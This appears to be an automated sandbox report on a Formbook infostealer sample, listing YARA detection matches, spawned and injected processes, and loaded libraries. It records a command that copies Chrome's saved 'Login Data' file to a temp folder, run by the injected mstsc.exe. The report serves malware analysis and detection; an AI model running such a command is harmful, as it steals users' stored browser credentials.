          Source: 00000000.00000002.1906133921.0000021CDFF61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000000.00000002.1906133921.0000021CDFF61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.1906133921.0000021CDFF61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: Process Memory Space: iexplore.exe PID: 7612, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: mstsc.exe PID: 7840, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: #U0426#U0438#U0442#U0430#U0442#U0430.exe, RuntimeMethodInfoStubToCharArray.csSuspicious URL: 'https://www.google.ru/'
          Source: #U0426#U0438#U0442#U0430#U0442#U0430.exe, 00000000.00000002.1908934139.0000021CE8670000.00000004.00000020.00020000.00000000.sdmp, #U0426#U0438#U0442#U0430#U0442#U0430.exe, 00000000.00000002.1903093132.0000021CCE3C0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb
          Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winEXE@322/289@33/14
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_003A3699 memset,memset,CreateThread,GetLastError,CloseHandle,LoadStringW,FormatMessageW,LoadStringW,MessageBoxW,LocalFree,6_2_003A3699
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_00378051 GetModuleFileNameW,GetLastError,wcsrchr,GetCurrentProcessId,SysAllocString,SysAllocString,CoCreateInstance,6_2_00378051
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_004162D5 FindResourceExW,LoadResource,6_2_004162D5
          Source: C:\Windows\SysWOW64\mstsc.exeFile created: C:\Users\user\AppData\Roaming\260P27U-Jump to behavior
          Source: C:\Users\user\Desktop\#U0426#U0438#U0442#U0430#U0442#U0430.exeMutant created: NULL
          Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7532
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8080:120:WilError_03
          Source: C:\Windows\System32\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\7754c235-8f37-456f-8c5f-f58dfc87077aJump to behavior
          Source: #U0426#U0438#U0442#U0430#U0442#U0430.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: #U0426#U0438#U0442#U0430#U0442#U0430.exeStatic file information: TRID: Win64 Executable GUI Net Framework (217006/5) 49.88%
          Source: C:\Windows\explorer.exeFile read: C:\Users\user\Favorites\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\#U0426#U0438#U0442#U0430#U0442#U0430.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: mstsc.exe, 00000006.00000003.1897407843.000000000328E000.00000004.00000020.00020000.00000000.sdmp, mstsc.exe, 00000006.00000002.4157660306.000000000328E000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000008.00000003.1892723066.0000000002D69000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000008.00000002.1893018281.0000000002D35000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
          Source: #U0426#U0438#U0442#U0430#U0442#U0430.exeReversingLabs: Detection: 55%
          Source: #U0426#U0438#U0442#U0430#U0442#U0430.exeVirustotal: Detection: 59%
          Source: mstsc.exeString found in binary or memory: unknown-client-address
          Source: C:\Users\user\Desktop\#U0426#U0438#U0442#U0430#U0442#U0430.exeFile read: C:\Users\user\Desktop\#U0426#U0438#U0442#U0430#U0442#U0430.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\#U0426#U0438#U0442#U0430#U0442#U0430.exe "C:\Users\user\Desktop\#U0426#U0438#U0442#U0430#U0442#U0430.exe"
          Source: C:\Users\user\Desktop\#U0426#U0438#U0442#U0430#U0442#U0430.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\iexplore.exe"
          Source: C:\Users\user\Desktop\#U0426#U0438#U0442#U0430#U0442#U0430.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7532 -s 1080
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\mstsc.exe "C:\Windows\SysWOW64\mstsc.exe"
          Source: C:\Windows\SysWOW64\mstsc.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\explorer.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\iexplore.exe"
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeProcess created: C:\Program Files\Internet Explorer\iexplore.exe "C:\Program Files\Internet Explorer\IEXPLORE.EXE"
          Source: C:\Program Files\Internet Explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3916 CREDAT:9474 /prefetch:2
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe" --from-ie-to-edge=3 --ie-frame-hwnd=204a6
          Source: C:\Program Files\Internet Explorer\iexplore.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe" --from-ie-to-edge=3 --ie-frame-hwnd=204a6
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeProcess created: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe "C:\PROGRA~2\Java\jre-1.8\bin\ssvagent.exe" -new
          Source: C:\Program Files\Internet Explorer\iexplore.exeProcess created: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe "C:\PROGRA~2\Java\jre-1.8\bin\ssvagent.exe" -new
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --from-ie-to-edge=3 --ie-frame-hwnd=204a6
          Source: C:\Windows\SysWOW64\mstsc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2076 --field-trial-handle=2028,i,9608727623901059389,15898401197256129571,262144 /prefetch:3
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=5640 --field-trial-handle=2028,i,9608727623901059389,15898401197256129571,262144 /prefetch:8
          Source: C:\Windows\explorer.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\iexplore.exe"
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeProcess created: C:\Program Files\Internet Explorer\iexplore.exe "C:\Program Files\Internet Explorer\IEXPLORE.EXE"
          Source: C:\Program Files\Internet Explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3916 CREDAT:9478 /prefetch:2
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=6476 --field-trial-handle=2028,i,9608727623901059389,15898401197256129571,262144 /prefetch:8
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=6476 --field-trial-handle=2028,i,9608727623901059389,15898401197256129571,262144 /prefetch:8
          Source: C:\Program Files\Internet Explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3916 CREDAT:3675436 /prefetch:2
          Source: C:\Windows\explorer.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start /prefetch:5
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=820 --field-trial-handle=2108,i,1526023711057746171,13780567962873584071,262144 /prefetch:3
          Source: C:\Windows\explorer.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start /prefetch:5
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=604 --field-trial-handle=1524,i,17359145505352969996,18071872945210523971,262144 /prefetch:3
          Source: C:\Users\user\Desktop\#U0426#U0438#U0442#U0430#U0442#U0430.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\iexplore.exe"Jump to behavior
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\mstsc.exe "C:\Windows\SysWOW64\mstsc.exe"Jump to behavior
          Source: C:\Windows\explorer.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\iexplore.exe" Jump to behavior
          Source: C:\Windows\explorer.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\iexplore.exe" Jump to behavior
          Source: C:\Windows\explorer.exeProcess created: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe "C:\PROGRA~2\Java\jre-1.8\bin\ssvagent.exe" -newJump to behavior
          Source: C:\Windows\explorer.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start /prefetch:5Jump to behavior
          Source: C:\Windows\SysWOW64\mstsc.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /VJump to behavior
          Source: C:\Windows\SysWOW64\mstsc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeProcess created: C:\Program Files\Internet Explorer\iexplore.exe "C:\Program Files\Internet Explorer\IEXPLORE.EXE" Jump to behavior
          Source: C:\Program Files\Internet Explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3916 CREDAT:9474 /prefetch:2Jump to behavior
          Source: C:\Program Files\Internet Explorer\iexplore.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe" --from-ie-to-edge=3 --ie-frame-hwnd=204a6Jump to behavior
          Source: C:\Program Files\Internet Explorer\iexplore.exeProcess created: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe "C:\PROGRA~2\Java\jre-1.8\bin\ssvagent.exe" -newJump to behavior
          Source: C:\Program Files\Internet Explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3916 CREDAT:9478 /prefetch:2Jump to behavior
          Source: C:\Program Files\Internet Explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3916 CREDAT:3675436 /prefetch:2Jump to behavior
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe" --from-ie-to-edge=3 --ie-frame-hwnd=204a6
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeProcess created: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe "C:\PROGRA~2\Java\jre-1.8\bin\ssvagent.exe" -new
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --from-ie-to-edge=3 --ie-frame-hwnd=204a6
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2076 --field-trial-handle=2028,i,9608727623901059389,15898401197256129571,262144 /prefetch:3
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=5640 --field-trial-handle=2028,i,9608727623901059389,15898401197256129571,262144 /prefetch:8
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=6476 --field-trial-handle=2028,i,9608727623901059389,15898401197256129571,262144 /prefetch:8
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=6476 --field-trial-handle=2028,i,9608727623901059389,15898401197256129571,262144 /prefetch:8
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeProcess created: C:\Program Files\Internet Explorer\iexplore.exe "C:\Program Files\Internet Explorer\IEXPLORE.EXE"
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=820 --field-trial-handle=2108,i,1526023711057746171,13780567962873584071,262144 /prefetch:3
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=604 --field-trial-handle=1524,i,17359145505352969996,18071872945210523971,262144 /prefetch:3
          Source: C:\Users\user\Desktop\#U0426#U0438#U0442#U0430#U0442#U0430.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Users\user\Desktop\#U0426#U0438#U0442#U0430#U0442#U0430.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\Desktop\#U0426#U0438#U0442#U0430#U0442#U0430.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\#U0426#U0438#U0442#U0430#U0442#U0430.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\Desktop\#U0426#U0438#U0442#U0430#U0442#U0430.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Users\user\Desktop\#U0426#U0438#U0442#U0430#U0442#U0430.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Users\user\Desktop\#U0426#U0438#U0442#U0430#U0442#U0430.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Users\user\Desktop\#U0426#U0438#U0442#U0430#U0442#U0430.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Users\user\Desktop\#U0426#U0438#U0442#U0430#U0442#U0430.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Users\user\Desktop\#U0426#U0438#U0442#U0430#U0442#U0430.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Users\user\Desktop\#U0426#U0438#U0442#U0430#U0442#U0430.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\Desktop\#U0426#U0438#U0442#U0430#U0442#U0430.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\#U0426#U0438#U0442#U0430#U0442#U0430.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Users\user\Desktop\#U0426#U0438#U0442#U0430#U0442#U0430.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\Desktop\#U0426#U0438#U0442#U0430#U0442#U0430.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: cdprt.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: ieframe.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: netapi32.dllJump to behavior
          Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: credui.dllJump to behavior
          Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: cryptui.dllJump to behavior
          Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: netapi32.dllJump to behavior
          Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: winmm.dllJump to behavior
          Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: ktmw32.dllJump to behavior
          Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: wkscli.dllJump to behavior
          Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: ieframe.dllJump to behavior
          Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: mlang.dllJump to behavior
          Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: winsqlite3.dllJump to behavior
          Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: vaultcli.dllJump to behavior
          Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: windowscodecs.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exeSection loaded: wininet.dll
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exeSection loaded: urlmon.dll
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exeSection loaded: iertutil.dll
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exeSection loaded: srvcli.dll
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exeSection loaded: netutils.dll
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exeSection loaded: kernel.appcore.dll
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exeSection loaded: uxtheme.dll
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exeSection loaded: windows.storage.dll
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exeSection loaded: wldp.dll
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exeSection loaded: propsys.dll
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exeSection loaded: profapi.dll
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exeSection loaded: edputil.dll
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exeSection loaded: windows.staterepositoryps.dll
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exeSection loaded: sspicli.dll
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exeSection loaded: wintypes.dll
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exeSection loaded: appresolver.dll
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exeSection loaded: bcp47langs.dll
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exeSection loaded: slc.dll
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exeSection loaded: userenv.dll
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exeSection loaded: sppc.dll
